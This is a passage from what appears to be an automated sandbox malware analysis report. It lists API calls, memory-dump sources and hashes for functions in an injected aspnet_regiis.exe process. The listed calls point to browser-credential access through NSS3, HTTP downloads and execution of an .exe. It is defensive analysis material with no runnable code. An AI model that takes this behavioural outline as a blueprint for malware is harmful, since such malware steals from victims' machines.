                                                                                                                                                                                • Part of subcall function 6CBCADC0: free.MOZGLUE(85145F8B,?,?,?,?,6CBACDBB,?,6CBAD079,00000000,00000001), ref: 6CBCAE7F
                                                                                                                                                                                • Part of subcall function 6CBCADC0: TlsGetValue.KERNEL32(?,6CBACDBB,?,6CBAD079,00000000,00000001), ref: 6CBCAEB1
                                                                                                                                                                                • Part of subcall function 6CBCADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CBACDBB,?,6CBAD079,00000000,00000001), ref: 6CBCAEC9
                                                                                                                                                                              • PK11_FreeSymKey.NSS3(?,6CC15D40,00000000,?,?,6CC06AC6,6CC1639C), ref: 6CC2AC44
                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6CC15D40,00000000,?,?,6CC06AC6,6CC1639C), ref: 6CC2AC59
                                                                                                                                                                              • free.MOZGLUE(8CB6FF01,6CC06AC6,6CC1639C,?,?,?,?,?,?,?,?,?,6CC15D40,00000000,?,6CC1AAD4), ref: 6CC2AC62
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1595327144-0
                                                                                                                                                                              • Opcode ID: 00319baf87b872b4d53799228b0164ac791d417a20b2874ee88631cac5740ef5
                                                                                                                                                                              • Instruction ID: 7a1393e9472f59657a9a9d1dd7347efad32d727e98bcd9d347325dda2f2a3a94
                                                                                                                                                                              • Opcode Fuzzy Hash: 00319baf87b872b4d53799228b0164ac791d417a20b2874ee88631cac5740ef5
                                                                                                                                                                              • Instruction Fuzzy Hash: 7A014FB5A002109FDB00DF15E8C0B4677A8AF44B5CF1880A8E9498F706E735E844CBA2
                                                                                                                                                                              Function 02A10CC0 Relevance: 6.0, APIs: 4, Instructions: 39memorytimeCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,02A365B6,?,?,?), ref: 02A10CD8
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A10CDF
                                                                                                                                                                              • GetLocalTime.KERNEL32(?), ref: 02A10CEB
                                                                                                                                                                              • wsprintfA.USER32 ref: 02A10D16
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 377395780-0
                                                                                                                                                                              • Opcode ID: 93fee3369c0bf994b9461f88bce045d8d1621915f6314d84801d071b7e4fd67b
                                                                                                                                                                              • Instruction ID: c24352565ebcf78fd2350923809a5d839511e9f18f4f2b41c957512799aefb80
                                                                                                                                                                              • Opcode Fuzzy Hash: 93fee3369c0bf994b9461f88bce045d8d1621915f6314d84801d071b7e4fd67b
                                                                                                                                                                              • Instruction Fuzzy Hash: 30F031A1D40228BBDB109FE59D04ABF77BCAB0C711F400585F941E2180E638DA90D771
                                                                                                                                                                              Function 02A12166 Relevance: 6.0, APIs: 4, Instructions: 34fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateFileA.KERNEL32(02A14FAC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,02A14FAC,?), ref: 02A12181
                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,02A14FAC,?,?,?,02A14FAC,?), ref: 02A12199
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,02A14FAC,?), ref: 02A121A4
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,02A14FAC,?), ref: 02A121AC
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseFileHandle$CreateSize
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4148174661-0
                                                                                                                                                                              • Opcode ID: 38a3b40c43dff5008bba76d78c8df1cf3024e080b93c82a17a43f6a6347f11d2
                                                                                                                                                                              • Instruction ID: 906e460097c0c823029c1a73da424ae44f38ab13137315b003ea99d80f4ace53
                                                                                                                                                                              • Opcode Fuzzy Hash: 38a3b40c43dff5008bba76d78c8df1cf3024e080b93c82a17a43f6a6347f11d2
                                                                                                                                                                              • Instruction Fuzzy Hash: 84F01231A81234BBE71097A0DC49FDA7A7DEB09760F104650FE01B61C0DB70EB958664
                                                                                                                                                                              Function 6CC9CC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalDeleteSectionfree
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2988086103-0
                                                                                                                                                                              • Opcode ID: 342612764acc85330a430392e368b4d0379ce82596a8227fc110039ca4a8c586
                                                                                                                                                                              • Instruction ID: cd0ed2cb14cdf42636fe98b79a7aaf8ba7b2100c9b4e83d92f98b6c8761ea4b2
                                                                                                                                                                              • Opcode Fuzzy Hash: 342612764acc85330a430392e368b4d0379ce82596a8227fc110039ca4a8c586
                                                                                                                                                                              • Instruction Fuzzy Hash: 83E03076700618ABCA10EFA8DC84886B7BCEE492703150565E695C3700D631F905CBA1
                                                                                                                                                                              Function 02A12BF0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124processCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                                • Part of subcall function 02A05237: GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 02A0527E
                                                                                                                                                                                • Part of subcall function 02A05237: RtlAllocateHeap.NTDLL(00000000), ref: 02A05285
                                                                                                                                                                                • Part of subcall function 02A05237: InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 02A052A7
                                                                                                                                                                                • Part of subcall function 02A05237: StrCmpCA.SHLWAPI(?), ref: 02A052C1
                                                                                                                                                                                • Part of subcall function 02A05237: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02A052F1
                                                                                                                                                                                • Part of subcall function 02A05237: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 02A05330
                                                                                                                                                                                • Part of subcall function 02A05237: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 02A05360
                                                                                                                                                                                • Part of subcall function 02A05237: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02A0536B
                                                                                                                                                                                • Part of subcall function 02A11C4A: GetSystemTime.KERNEL32(?,02A36701,?), ref: 02A11C79
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                                • Part of subcall function 02A12446: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,02A14A8D), ref: 02A12460
                                                                                                                                                                              • _memset.LIBCMT ref: 02A12CDF
                                                                                                                                                                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,02A36710), ref: 02A12D31
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcpy$Internet$CreateHeapHttpOpenProcessRequestlstrcat$AllocateConnectFileOptionSendSystemTime_memsetlstrlen
                                                                                                                                                                              • String ID: .exe
                                                                                                                                                                              • API String ID: 2831197775-4119554291
                                                                                                                                                                              • Opcode ID: a5feab2284a3bd3e87ee5f08294697300bc2f73362ef24e40821f015e1bcab22
                                                                                                                                                                              • Instruction ID: 03f7b27c6e5822a5e4877328d94c14e15e5f8c3da0d751f4d74b3ddb9cf1d614
                                                                                                                                                                              • Opcode Fuzzy Hash: a5feab2284a3bd3e87ee5f08294697300bc2f73362ef24e40821f015e1bcab22
                                                                                                                                                                              • Instruction Fuzzy Hash: 31415136D80218ABDF11FBA4EE85ADE777AAF40364F410061EE05B7150DE70AE4A8FD1
                                                                                                                                                                              Function 02A0F093 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Xinvalid_argument_memmovestd::_
                                                                                                                                                                              • String ID: string too long
                                                                                                                                                                              • API String ID: 256744135-2556327735
                                                                                                                                                                              • Opcode ID: 80290da8c2b694f11ae865625dd6a7f3e67ba5935f0100eff076d7f991d3a43b
                                                                                                                                                                              • Instruction ID: 7a56682528727cd1533573f01397145a2ee8656b769992052132abc4a9067030
                                                                                                                                                                              • Opcode Fuzzy Hash: 80290da8c2b694f11ae865625dd6a7f3e67ba5935f0100eff076d7f991d3a43b
                                                                                                                                                                              • Instruction Fuzzy Hash: 98118C71300601AFAA249F2DE9C0D29B3BAFB943647040219F901EBA81DF71ADA5C6A1
                                                                                                                                                                              Function 02A11ECF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: malloc
                                                                                                                                                                              • String ID: image/jpeg
                                                                                                                                                                              • API String ID: 2803490479-3785015651
                                                                                                                                                                              • Opcode ID: b80ce0dced6f757e3e40f0c856cd99bd05bd8afb4376d0dedaa8d3dac1f59bda
                                                                                                                                                                              • Instruction ID: 2d23741c12f5142c4570da37e163271a11737684367a889be41acf55e8ee6933
                                                                                                                                                                              • Opcode Fuzzy Hash: b80ce0dced6f757e3e40f0c856cd99bd05bd8afb4376d0dedaa8d3dac1f59bda
                                                                                                                                                                              • Instruction Fuzzy Hash: 7211AD72D10218FFCB118FA5CC8489EBB7AFE05370B21026BFA19B2190DB719A40CA50
                                                                                                                                                                              Function 02A0F128 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 02A0F13E
                                                                                                                                                                                • Part of subcall function 02A2EC45: std::exception::exception.LIBCMT ref: 02A2EC5A
                                                                                                                                                                                • Part of subcall function 02A2EC45: __CxxThrowException@8.LIBCMT ref: 02A2EC6F
                                                                                                                                                                                • Part of subcall function 02A2EC45: std::exception::exception.LIBCMT ref: 02A2EC80
                                                                                                                                                                                • Part of subcall function 02A0F238: std::_Xinvalid_argument.LIBCPMT ref: 02A0F242
                                                                                                                                                                              • _memmove.LIBCMT ref: 02A0F190
                                                                                                                                                                              Strings
                                                                                                                                                                              • invalid string position, xrefs: 02A0F139
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                                                                                                                              • String ID: invalid string position
                                                                                                                                                                              • API String ID: 3404309857-1799206989
                                                                                                                                                                              • Opcode ID: ab4920db7f9c842c58b83298395b09fd6fdd20485d934f5f89a1ec6259fcd6e3
                                                                                                                                                                              • Instruction ID: 8b73b4cc9a2f33df3813d7caca677bd47a0a81cde7b520c875229407f52233f9
                                                                                                                                                                              • Opcode Fuzzy Hash: ab4920db7f9c842c58b83298395b09fd6fdd20485d934f5f89a1ec6259fcd6e3
                                                                                                                                                                              • Instruction Fuzzy Hash: C1118E31704211AFDB24DE6CEDC0A59B3A6AF48324744055AEA16EBA81CF70ED44CBD1
                                                                                                                                                                              Function 02A0F34D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 02A0F35C
                                                                                                                                                                                • Part of subcall function 02A2EC45: std::exception::exception.LIBCMT ref: 02A2EC5A
                                                                                                                                                                                • Part of subcall function 02A2EC45: __CxxThrowException@8.LIBCMT ref: 02A2EC6F
                                                                                                                                                                                • Part of subcall function 02A2EC45: std::exception::exception.LIBCMT ref: 02A2EC80
                                                                                                                                                                              • memmove.MSVCRT(02A0EEBE,02A0EEBE,C6C68B00,02A0EEBE,02A0EEBE,02A0F15F,?,?,?,02A0F1DF,?,?,?,76F90440,?,-00000001), ref: 02A0F392
                                                                                                                                                                              Strings
                                                                                                                                                                              • invalid string position, xrefs: 02A0F357
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
                                                                                                                                                                              • String ID: invalid string position
                                                                                                                                                                              • API String ID: 1659287814-1799206989
                                                                                                                                                                              • Opcode ID: 10a7d493370c86c327728a83034fbb1308c76fd5e6c8090a030617c5b32200e1
                                                                                                                                                                              • Instruction ID: 615457ffe82cebaf2a7be52a95bebe1ba9017985fcfb94ef2d5574a64f9cd519
                                                                                                                                                                              • Opcode Fuzzy Hash: 10a7d493370c86c327728a83034fbb1308c76fd5e6c8090a030617c5b32200e1
                                                                                                                                                                              • Instruction Fuzzy Hash: 1601AD713007018FD7348E69A8C452EB6F2EB84B25724497CE1A2D7A85DF78E84A8792
                                                                                                                                                                              Function 02A1F3BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
